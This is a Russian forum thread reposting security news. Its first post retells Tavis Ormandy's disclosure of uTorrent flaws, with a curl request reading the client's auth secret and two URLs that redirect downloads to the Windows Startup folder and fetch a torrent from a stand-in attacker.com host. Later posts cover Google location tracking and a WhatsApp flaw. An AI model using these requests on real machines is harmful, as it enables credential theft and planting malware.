www.crack-forum.ru

Вернуться   www.crack-forum.ru > Главная категория > Главный раздел > Новости

Важная информация

Реклама на форуме:

Ответ
 
Опции темы Опции просмотра
Старый 22.02.2018, 21:00   #1
Finist3
летел и таял
 
Аватар для Finist3
 
Регистрация: 28.06.2009
Адрес: ни дом и ни улица
Сообщений: 2,798
Сказал(а) спасибо: 3,612
Поблагодарили 6,460 раз(а) в 1,715 сообщениях
Finist3 отключил(а) отображение уровня репутации
Новости сетевой безопасности

Уязвимость в uTorrent Web позволяет загрузить произвольный файл в папку автозагрузки

В двух версиях uTorrent (под Windows и в веб-версии uTorrent Web) обнаружено несколько опасных уязвимостей, которые легко эксплуатировать. При этом они позволяют запускать произвольный код на машине, где запущен uTorrent (веб-версия); получить доступ к скачанным файлам, в том числе копировать их, просматривать историю скачиваний (веб-версия и Windows).
Взлом возможен только если uTorrent работает с настройками по умолчанию, а именно с HTTP RPC сервером на порту 10000 (uTorrent Classic) или 19575 (веб-версия uTorrent) с активированным обработчиком /proxy/ (он активирован по умолчанию).
Баги нашёл хакер Тэвис Орманди (Tavis Ormandy) из подразделения Project Zero в компании Google. Он разгласил информацию в баг-трекере Chromium 31 января 2018 года (через 90 дней после того, как сообщил о ней разработчикам).
Как пишет Тэвис, любой веб-сайт может взаимодействовать с вышеуказанными RPC-серверами через программный интерфейс XMLHTTPRequest(). Это API использует запросы HTTP или HTTPS напрямую к серверу и загружает данные ответа сервера напрямую в вызывающий скрипт. Интерфейс позволяет осуществлять HTTP-запросы к серверу без перезагрузки страницы и часто используется на многих современных сайтах.
Для взлома машины, где работает uTorrent, нужно заманить пользователя на веб-страницу, где установлен эксплоит. Это может быть совершенно любой сайт. Эксплоит через перепривязывание DNS по XMLHTTPRequest() заставляет браузер запустить скрипт, обращающийся к этому RPC-серверу.

_https://ru.wikipedia.org/wiki/DNS_rebinding

На демо-странице приведены примеры, какие действия может инициировать веб-сайт через интерфейс JSON RPC сервера на порту 10000. Здесь через программный интерфейс по XMLHTTPRequest() отправляются стандартные команды uTorrent.

Тэвис пишет, что изучая разные команды uTorrent-клиенту он заметил, что в программе с настройками по умолчанию активен обработчик /proxy/, что позволяет стороннему сайту посмотреть список скачанных файлов и скопировать их. То есть по умолчанию uTorrent позволяет любому сайту проверить список скачанных вами торрентов, достаточно лишь сбрутить одно маленькое число (sid), которое присваивается каждому открытому торренту по очереди.

Орманди сделал демо-страничку. Хакер говорит, что демка работает медленно, но если вы всё-таки хотите увидеть фокус, то сделайте следующее:

Установите uTorrent с дефолтными настройками.
Добавьте торрент из URL:

_https://archive.org/download/SKODAOCTAVIA336x280/SKODAOCTAVIA336x280_archive.torrent

По окончании скачивания торрента (5 МБ) перейдите на страницу с демкой.

_http://lock.cmpxchg8b.com/Ahg8Aesh.html

Подождите несколько минут.

По ходу изучения программы uTorrent Тэвис нашёл в ней ещё парочку багов и недостатков: например, некорректный генератор псевдослучайных чисел, отключение защиты памяти ASLR и неправильная работа в «гостевом» режиме, где должны быть отключены многие функции, а на самом деле они доступны через тот же сервер на порту 10000.

В веб-версии уязвимость ещё жёстче, потому что там любой сторонний сайт может получить доступ к токену аутентификации, секрет которого хранится в открытой папке webroot (как и настройки, дампы, логи и др.)

$ curl -si _http://localhost:19575/users.conf
HTTP/1.1 200 OK
Date: Wed, 31 Jan 2018 19:46:44 GMT
Last-Modified: Wed, 31 Jan 2018 19:37:50 GMT
Etag: "5a721b0e.92"
Content-Type: text/plain
Content-Length: 92
Connection: close
Accept-Ranges: bytes

localapi29c802274dc61fb4 bc676961df0f684b13adae450a57a91cd3d92c03 94bc897965398c8a07ff 2 1

Получив секрет, можно дистанционно изменить директорию для скачивания и дать команду на загрузку произвольного файла, например, загрузить вредоносный код в папку автозагрузки.

_http://127.0.0.1:19575/gui/?localauth=token:&action=setsetting&s=dir_active_d ownload&v=C:/Users/All%20Users/Start%20Menu/Programs/Startup

_http://127.0.0.1:19575/gui/?localauth=token:&action=add-url&url=http://attacker.com/calc.exe.torrent

Рабочий эксплоит:

_http://lock.cmpxchg8b.com/Moer0kae.html

Разработчики из компании BitTorrent, Inc. уже выпустили патч для uTorrent под Windows. Пока что он доступен только в бета-версии uTorrent/BitTorrent 3.5.3.44352, которая в ближайшее время должна стать доступна через механизм автоматического обновления. Пользователям uTorrent Web надо обновиться на последний билд 0.12.0.502.

Источник: geektimes

Последний раз редактировалось Finist3; 14.08.2018 в 19:14
Finist3 вне форума   Ответить с цитированием
Эти 3 пользователя(ей) сказали cпасибо за это полезное сообщение
goragor (23.02.2018), ifrit (18.03.2018), АлександрСФ (19.03.2018)
Старый 14.08.2018, 19:13   #2
Finist3
летел и таял
 
Аватар для Finist3
 
Регистрация: 28.06.2009
Адрес: ни дом и ни улица
Сообщений: 2,798
Сказал(а) спасибо: 3,612
Поблагодарили 6,460 раз(а) в 1,715 сообщениях
Finist3 отключил(а) отображение уровня репутации
Google поймали на постоянной слежке за всеми пользователями

Сервисы Google записывают историю местоположения владельца смартфона, даже если тот отключил эту функцию в настройках конфиденциальности. Об этом говорится в исследовании Associated Press.

На странице поддержки Google указано, что пользователи могут в любой момент отключить историю передвижений, однако некоторые фирменные приложения продолжат автоматически сохранять данные с отметкой о времени без разрешения.

Исследователи отмечают, что Google записывает информацию о местонахождении пользователя в тот момент, когда он открывает приложение «Карты». Автоматические ежедневные обновления погоды на Android-смартфонах точно определяют, где находится владелец устройства. Кроме того, отдельные запросы в поисковике, которые вообще не связаны с местоположением, могут точно определять широту и долготу пользователей и сохранять ее в учетной записи.

Проблема конфиденциальности затрагивает около двух миллиардов пользователей Android-устройств и сотни миллионов владельцев смартфонов компании Apple, на которых установлены фирменные сервисы Google.

Представители компании Google заявили, что у компании есть несколько инструментов, которые используют местоположение пользователя.

«Мы предоставляем четкие описания этих инструментов и надежные средства управления, чтобы люди могли включать, выключать или удалять свои истории в любое время», — отметили в пресс-службе корпорации. В Google добавили, что пользователи могут полностью отключить историю местоположений, однако для этого им нужно зайти в настройки конфиденциальности и отключить другой параметр под названием «История приложений и веб-поиска».

Эксперты упрекнули компанию в том, что этот пункт меню никак не связан с историей местоположений, поэтому рядовые пользователи не узнают о нем и вряд ли его отключат. При этом их локация постоянно будет отслеживаться.

lenta.ru
Finist3 вне форума   Ответить с цитированием
Старый 14.08.2018, 19:13   #3
Finist3
летел и таял
 
Аватар для Finist3
 
Регистрация: 28.06.2009
Адрес: ни дом и ни улица
Сообщений: 2,798
Сказал(а) спасибо: 3,612
Поблагодарили 6,460 раз(а) в 1,715 сообщениях
Finist3 отключил(а) отображение уровня репутации
В WhatsApp обнаружили опасную уязвимость

Представьте себе, что в вашу переписку в WhatsApp может вклиниться другой человек со вполне конкретным злым умыслом. Специалисты Check Point обнаружили ужасающую «дыру», благодаря которой киберпреступник может получить доступ к чату и исправить цитируемое сообщение, наделив смыслом, которого изначально в нем не было.

Найденную уязвимость можно использовать несколькими способами: менять слова собеседника в чате, имитировать общение от имени участника, которого в действительности в чате нет, при этом другим будет казаться, что он онлайн, а также отправлять в групповой чат сообщения якобы в «личку», ответ на которые (весьма вероятно — компрометирующий) будет виден всем участникам.

Для того чтобы воспользоваться дырой, достаточно перехватить зашифрованный трафик — и вот потенциальная жертва «в кармане» у злодеев. Если баг не будет устранен в ближайшее время, последствия — от необратимого персонального ущерба до разрушения корпораций путем распространения заведомо ложных сведений — предсказать невозможно.

Кстати, отечественный мессенджер ICQ мало в чем уступает WhatsApp. В дополнение к групповым звонкам, он обладает и другими сильными сторонами, которых нет у детища Facebook. «Аська» поддерживает пины сообщений и упоминания пользователей в них, поиск и редактирование отправленных сообщений, а также стикеры (поиск по наборам, эмодзи и прочее).

mail.ru
Finist3 вне форума   Ответить с цитированием
Ответ

Закладки


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Часовой пояс GMT +4, время: 13:01.


Перевод: zCarot

Сайт не предоставляет электронные версии произведений и ПО, а занимается индексированием файлов, находящихся в файлообменных сетях. Весь материал, представленный на сайте www.crack-forum.ru взят из открытых источников или прислан посетителями сайта. Материал используется исключительно в некоммерческих целях. Все права на публикуемые аудио, видео, графические и текстовые материалы принадлежат их владельцам. Запрещено любое использование материалов сайта без письменного разрешения авторов материала.

Если Вы являетесь автором материала или обладателем авторских прав на него и против его использования на сайте www.crack-forum.ru , пожалуйста свяжитесь с администрацией.

К сведению защитников авторского права и прочего, прочего.... На данном сайте не хранится НИ ОДНОГО файла нарушающего законодательство РФ - соответственно, при публикации ссылок на сторонние ресурсы пользователями администрация ответственности НЕ НЕСЕТ - ни материальной, ни уголовной, ни какой-либо еще. Предъявляйте Ваши претензии тем пользователям, которые публикуют данные материалы.

Портал www.crack-forum.ru ни перед кем ни при каких обстоятельствах не несет ответственности за фактический, побочный, случайный или косвенный ущерб, связанный, а также вызываемый скачиванием файлов посредством выложенных ссылок нашими пользователями, найденными в сети, и использованием ссылок.


Узнать подробнее или подать жалобу